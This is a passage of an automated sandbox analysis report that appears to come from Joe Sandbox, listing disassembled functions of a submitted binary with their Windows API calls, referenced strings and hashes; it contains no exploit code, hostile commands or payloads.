Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: 577bc0861796b8261368056c90b843c4a53b7175ab165f2c3a9dab1d51633459
Instruction ID: 0ed78e77f9698b809d02e899a200000ec7101b462ac89f610c664c3257f1291c
Opcode Fuzzy Hash: 577bc0861796b8261368056c90b843c4a53b7175ab165f2c3a9dab1d51633459
Instruction Fuzzy Hash: 8A41C571600204AFDB249F75D941EBA73E4EB88304F20447FE549D72D2EB39AD42CB59

Function 0046A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0046A259
CreateCompatibleDC.GDI32(00000000), ref: 0046A260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0046A273
SelectObject.GDI32(00000000,00000000), ref: 0046A27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 0046A286
DeleteDC.GDI32(00000000), ref: 0046A28F
GetWindowLongW.USER32(?,000000EC), ref: 0046A299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0046A2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0046A2B9

Strings

static, xrefs: 0046A1F1

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 04059288f0612eee2913be471e87d3cea3018146251acc12bc86b50143704a6e
Instruction ID: 986c0112dff5ea32e0688fc01ade664d254e7fb72aa65afae893e1e38ea2680e
Opcode Fuzzy Hash: 04059288f0612eee2913be471e87d3cea3018146251acc12bc86b50143704a6e
Instruction Fuzzy Hash: 9631AF31501118ABDF115FA4DC49FEF3B69FF09324F100229FA19A22E0D739D821DB6A

Function 00446F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00446F1D
gethostname.WSOCK32(?,00000100), ref: 00446F37
gethostbyname.WSOCK32(?), ref: 00446F44
_wcscpy.LIBCMT ref: 00446F6C
inet_ntoa.WSOCK32(?), ref: 00446F8A
_strcat.LIBCMT ref: 00446F98
_wcscpy.LIBCMT ref: 00446FAF
WSACleanup.WSOCK32 ref: 00446FBD
_wcscpy.LIBCMT ref: 00446FCB

Strings

0.0.0.0, xrefs: 00446F66

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: 9d6fd2ed91ba6aa9e90f4df857676565db699ef19e6ec5c52a5473821e06dc47
Instruction ID: 9ff267ec6d560c425b52b79f1213ef4c92f4d937c1e0f718be36d2864fea819c
Opcode Fuzzy Hash: 9d6fd2ed91ba6aa9e90f4df857676565db699ef19e6ec5c52a5473821e06dc47
Instruction Fuzzy Hash: 72112731904114AFEB146B61AC49EDE77ACEF01714F01007BF44592082EF78AE85875D

Function 0042500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00425047

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

__gmtime64_s.LIBCMT ref: 004250E0
__gmtime64_s.LIBCMT ref: 00425116
__gmtime64_s.LIBCMT ref: 00425133
__allrem.LIBCMT ref: 00425189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004251A5
__allrem.LIBCMT ref: 004251BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004251DA
__allrem.LIBCMT ref: 004251F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042520F
__invoke_watson.LIBCMT ref: 00425280

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: 90e1e9256e69eabba9ee52f5690f89fe01e33d53c5fc913f30279bab376557cd
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: 3E71D771B00B26ABE7149E79DC41B6AB3A8AF14368F54426FF410D63C1E778DD408BD8

Function 00444DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00444DF8
GetMenuItemInfoW.USER32(004C1708,000000FF,00000000,00000030), ref: 00444E59
SetMenuItemInfoW.USER32(004C1708,00000004,00000000,00000030), ref: 00444E8F
Sleep.KERNEL32(000001F4), ref: 00444EA1
GetMenuItemCount.USER32(?), ref: 00444EE5
GetMenuItemID.USER32(?,00000000), ref: 00444F01
GetMenuItemID.USER32(?,-00000001), ref: 00444F2B
GetMenuItemID.USER32(?,?), ref: 00444F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00444FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00444FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00444FEB

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 4a1e69a52a26fff927a18392969245bc3bb0152db4d396db6c4dc7db864403c1
Instruction ID: fe9dd4acc330e0067c0764243ddef19340b974bd8c93f78c1856fcd7b282a81b
Opcode Fuzzy Hash: 4a1e69a52a26fff927a18392969245bc3bb0152db4d396db6c4dc7db864403c1
Instruction Fuzzy Hash: 5A618071900289EFEB11CFA4D884EAF7BB8FB85308F14055BF541A7291D739AD49CB29

Function 00469C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00469C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00469C9B
GetWindowLongW.USER32(?,000000F0), ref: 00469CBF
_memset.LIBCMT ref: 00469CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00469CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00469D5A

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: b5315577e3a6e24632633fc4f6668461ab79e7f15bb912d84bb2d3e563429939
Instruction ID: c641717cd16f34e064070c6fb9a8910300556aedad1884a20629e16e47b980a1
Opcode Fuzzy Hash: b5315577e3a6e24632633fc4f6668461ab79e7f15bb912d84bb2d3e563429939
Instruction Fuzzy Hash: 1E617C75A00208AFDB10DFA4CC81EEE77B8EF09714F14416AFA04E72A2D7B4AD46DB55

Function 004394E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 004394FE
SafeArrayAllocData.OLEAUT32(?), ref: 00439549
VariantInit.OLEAUT32(?), ref: 0043955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 0043957B
VariantCopy.OLEAUT32(?,?), ref: 004395BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 004395D2
VariantClear.OLEAUT32(?), ref: 004395E7
SafeArrayDestroyData.OLEAUT32(?), ref: 004395F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004395FD
VariantClear.OLEAUT32(?), ref: 0043960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0043961A

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: bed0439e2b7beaf883a6717116f74a8cb8083123d44484a5f0b235fb7ecd000e
Instruction ID: e980d16f425cbb2d7f1633ed62324256478b1fd8f64321c89d047c85fae3fde7
Opcode Fuzzy Hash: bed0439e2b7beaf883a6717116f74a8cb8083123d44484a5f0b235fb7ecd000e
Instruction Fuzzy Hash: E4414F31D01219AFCB01EFA4DC849DEBB79FF08754F00846AE552A3251DB74EA85CBA9

Function 0045BB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045BB5C
VariantInit.OLEAUT32(?), ref: 0045BC2D
VariantInit.OLEAUT32(?), ref: 0045BD2E
VariantClear.OLEAUT32(?), ref: 0045BD38
VariantClear.OLEAUT32(?), ref: 0045BD99

Strings

|?K, xrefs: 0045BB34
Null Object assignment in FOR..IN loop, xrefs: 0045BBBD, 0045BCEB, 0045BDA7
h?K, xrefs: 0045BB2D
Incorrect Object type in FOR..IN loop, xrefs: 0045BD11

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?K$|?K
API String ID: 2862541840-2406439248
Opcode ID: 6e4e10243490a1572ac59a79694cec31bb5b9fc99f04c3f17a603e71361ee7b6
Instruction ID: 462dca1ff8e4cd4e8f51f2ae79d12a39a36ebdc8fee863f05bd706811c307ba1
Opcode Fuzzy Hash: 6e4e10243490a1572ac59a79694cec31bb5b9fc99f04c3f17a603e71361ee7b6
Instruction Fuzzy Hash: 5191A071A00215ABDB24CF95C844FAFB7B8EF84715F10851EF905AB282D7789949CFA8

Function 0045ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

CoInitialize.OLE32 ref: 0045ADF6
CoUninitialize.OLE32 ref: 0045AE01
CoCreateInstance.OLE32(?,00000000,00000017,0048D8FC,?), ref: 0045AE61
IIDFromString.OLE32(?,?), ref: 0045AED4
VariantInit.OLEAUT32(?), ref: 0045AF6E
VariantClear.OLEAUT32(?), ref: 0045AFCF

Strings

NULL Pointer assignment, xrefs: 0045AEA6
Failed to create object, xrefs: 0045AE6C, 0045AF22
Invalid parameter, xrefs: 0045AEED

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: d2430af211e6283dd56d6ad4109776fc80f67fdeaeead523f8fa391f47edb8cb
Instruction ID: c20346a15e988a54f04bac49df2388cda8baec57d7b2c93a2b2cfcbf474f938e
Opcode Fuzzy Hash: d2430af211e6283dd56d6ad4109776fc80f67fdeaeead523f8fa391f47edb8cb
Instruction Fuzzy Hash: AB61AA712082019FD710EF54C885B6BB7E8AF48705F104A1EF9859B292C738ED48CB9B

Function 00458107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00458168
inet_addr.WSOCK32(?,?,?), ref: 004581AD
gethostbyname.WSOCK32(?), ref: 004581B9
IcmpCreateFile.IPHLPAPI ref: 004581C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00458237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0045824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 004582C2
WSACleanup.WSOCK32 ref: 004582C8

Strings

Ping, xrefs: 004581EB

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 578c9b1b206952d302affdcfa7746bd2bdf3308ed4e33d94786b63cbb9f18845
Instruction ID: 6169de0f2218d960c0ab1a07c4e34582c49a3c026cf62a9345236731c9483be2
Opcode Fuzzy Hash: 578c9b1b206952d302affdcfa7746bd2bdf3308ed4e33d94786b63cbb9f18845
Instruction Fuzzy Hash: 5B5190316046009FD710AF65CC45B2ABBE4AF48315F04496EFE95A72E2DF78E849CB4A

Function 0044E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0044E396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0044E40C
GetLastError.KERNEL32 ref: 0044E416
SetErrorMode.KERNEL32(00000000,READY), ref: 0044E483

Strings

READY, xrefs: 0044E45C
INVALID, xrefs: 0044E455
NOTREADY, xrefs: 0044E442
READONLY, xrefs: 0044E44E
UNKNOWN, xrefs: 0044E43B

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 01ba7ce30ddbc10fde12fee7c343b026316a3d7d4d61aa6e2f42a8b7e63d1a86
Instruction ID: deef7bb9133456d45671f0089767791a2d6dc48f87c92770ff7c575c249a761d
Opcode Fuzzy Hash: 01ba7ce30ddbc10fde12fee7c343b026316a3d7d4d61aa6e2f42a8b7e63d1a86
Instruction Fuzzy Hash: F7319635A00205DFE701DFA6C885ABEBBB4FF04304F14852BE505A72D1D7789902CB59

Function 0043B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0043B98C
GetDlgCtrlID.USER32 ref: 0043B997
GetParent.USER32 ref: 0043B9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 0043B9B6
GetDlgCtrlID.USER32(?), ref: 0043B9BF
GetParent.USER32(?), ref: 0043B9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 0043B9DE

Strings

ComboBox, xrefs: 0043B911
ListBox, xrefs: 0043B949

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 3bcb663be40f995116a4500a94c10027ba1feaa6554d7cd177f255e44a571ec5
Instruction ID: a07899d160a5e18dd00fdcc05e482e6a444e85eff54bdb180093bf107e1422ec
Opcode Fuzzy Hash: 3bcb663be40f995116a4500a94c10027ba1feaa6554d7cd177f255e44a571ec5
Instruction Fuzzy Hash: 7621D6B4900108BFCB04ABA1DC86FFEB774EF49300F10022AF651A32E1DB785815DB68

Function 0043B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0043BA73
GetDlgCtrlID.USER32 ref: 0043BA7E
GetParent.USER32 ref: 0043BA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 0043BA9D
GetDlgCtrlID.USER32(?), ref: 0043BAA6
GetParent.USER32(?), ref: 0043BAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 0043BAC5

Strings

ComboBox, xrefs: 0043B9FA
ListBox, xrefs: 0043BA32

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 59888c3b27fd14752752993d2d9eb33296def0342838a18ce09273204faf2c51
Instruction ID: c0e5afae8c8e13aff3e19bf3cbcad26b141080f5ba7c41a1646e7bea24d3a6bf
Opcode Fuzzy Hash: 59888c3b27fd14752752993d2d9eb33296def0342838a18ce09273204faf2c51
Instruction Fuzzy Hash: 5C21C5B4E00108BFDB01AB64DC85FFEB775EF49304F10012AF551A32D1EBB959159B68

Function 0043BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0043BAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 0043BAF8
_wcscmp.LIBCMT ref: 0043BB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0043BB85

Strings

list, xrefs: 0043BB67
SHELLDLL_DefView, xrefs: 0043BB04
details, xrefs: 0043BB33
smallicons, xrefs: 0043BB4D
largeicons, xrefs: 0043BB19

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: c451a03d17e809ab73e8b0cdf2e8c7bbff5350a593939ca333ebd2375d143aa1
Instruction ID: 2070b6ab83162e7f047df6f48df3bdaf150f91585804ba7c5810778eb6538e82
Opcode Fuzzy Hash: c451a03d17e809ab73e8b0cdf2e8c7bbff5350a593939ca333ebd2375d143aa1
Instruction Fuzzy Hash: 95110436648306F9FA206621AC17FA7B79CDF18324F200027FA14E14D6FFE9681145AC

Function 0045B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0045B2D5
CoInitialize.OLE32(00000000), ref: 0045B302
CoUninitialize.OLE32 ref: 0045B30C
GetRunningObjectTable.OLE32(00000000,?), ref: 0045B40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 0045B539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0045B56D
CoGetObject.OLE32(?,00000000,0048D91C,?), ref: 0045B590
SetErrorMode.KERNEL32(00000000), ref: 0045B5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045B623
VariantClear.OLEAUT32(0048D91C), ref: 0045B633

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 301dd562f504750e18c9c09a54e90c3d09a2858f6c32928bb50ba07065798680
Instruction ID: 3a49f2702521660ca2d56ed100b0fa379dcf273da301727b518e4a995d1f856e
Opcode Fuzzy Hash: 301dd562f504750e18c9c09a54e90c3d09a2858f6c32928bb50ba07065798680
Instruction Fuzzy Hash: 64C13671608304AFC704EF65C88492BB7E9FF88309F00492EF9899B252D775ED09CB96

Function 0042ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0042ACC1

Part of subcall function 00427CF4: __mtinitlocknum.LIBCMT ref: 00427D06
Part of subcall function 00427CF4: RtlEnterCriticalSection.KERNEL32(00000000,?,00427ADD,0000000D), ref: 00427D1F

__calloc_crt.LIBCMT ref: 0042ACD2

Part of subcall function 00426986: __calloc_impl.LIBCMT ref: 00426995
Part of subcall function 00426986: Sleep.KERNEL32(00000000,000003BC,0041F507,?,0000000E), ref: 004269AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 0042ACED
GetStartupInfoW.KERNEL32(?,004B6E28,00000064,00425E91,004B6C70,00000014), ref: 0042AD46
__calloc_crt.LIBCMT ref: 0042AD91
